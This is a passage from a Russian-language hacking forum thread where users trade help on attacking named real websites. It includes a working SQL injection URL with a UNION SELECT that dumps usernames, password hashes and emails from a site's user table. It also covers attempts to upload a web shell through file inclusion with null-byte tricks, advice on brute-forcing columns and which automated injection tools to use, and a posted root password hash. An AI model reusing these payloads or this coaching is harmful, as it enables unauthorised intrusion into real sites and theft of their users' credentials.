tmp хорошо, но никак не задействовать допустим шелл из этой папки... если не ошибаюсь только при помощи локального инклуда.
DrakonSerg а кто его знает то? были пару экстрасенсов на ачате, да некоторые в бане от Егорыча так как постоянно его пароль узнавали, а некоторые еще не знают что они экстрасенсы... У меня машина не едет, как ты думаешь что в ней сломалось?
машина не едет, значит что то сломано. То есть осталось поломку только найти, то что она есть уже железно. По выдачи этих ошибок возможность инъекции не определить? А как можно определить? Очень сайт нужен тот...
это точно? Выдается та же страница. Чем эту уязвимость можно крутонуть автоматически? Вы звиняйте за нубские вопросы. Никогда как то не приходилось с sql плотно стыкаться.
1) содержимое страницы не должно изменяться (картинки соответственно). 2) sipt 4.0 pangolin sqlhelper toolza
Code: http://www.mustad.no/catalog/products.php?id= Это PHP-инъекция? Можно ли как нибудь залить шелл?
CyberHunter, да, это инклуд, но, скорее всего, файл для инклуда берется из поля БД, id которого - твой GET параметр. DrakonSerg, да, надо брутить, т.к., судя по логам, ветка 4-я, в которой нету information_schema.
mailbrush, т.е. вот так: Code: http://www.mustad.no/catalog/products.php?id=adress_gde_shell но так появляется ошибка (та же самая). Пробовал подставлять нулл байт, не помогло.
не факт что там allow_url_include=on не факт что там magic_quotes_gpc=off (попробуй вместо нулл байта ?)
Не могу залить шелл. http://zoor.biz/company.php?cn=ARSHAD+RASHEED+MUGHAL+PLASTIC+STORE&id=-6019+union+select+1,2,3,concat_ws(0x3a,uid, name, pass, mail, mode, sort, threshold, theme, signature, signature_format, created, access, login, status, timezone, language, picture, init, data),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+hashoo_zbo.users+limit+1,1+--+
Блин, ну натолкните на идею или статью... Я уже задолбался. Вытащил имя и версию дб. Колонки нужно брутить, как их брутить я вообще хз. Pangolin.Pro.v3.0.0.1011 выдал мне имена колонок каких то, но как оттуда данные вытащить я тоже не пойму. По какому мне запросу гуглить, чтобы вникнуть в ситуацию? ЗЫ кто хочет помочь, посмотрите два мои поста выше, понятней будет НАпротив акка root вот такой хеш: 3649d1fc783e0b49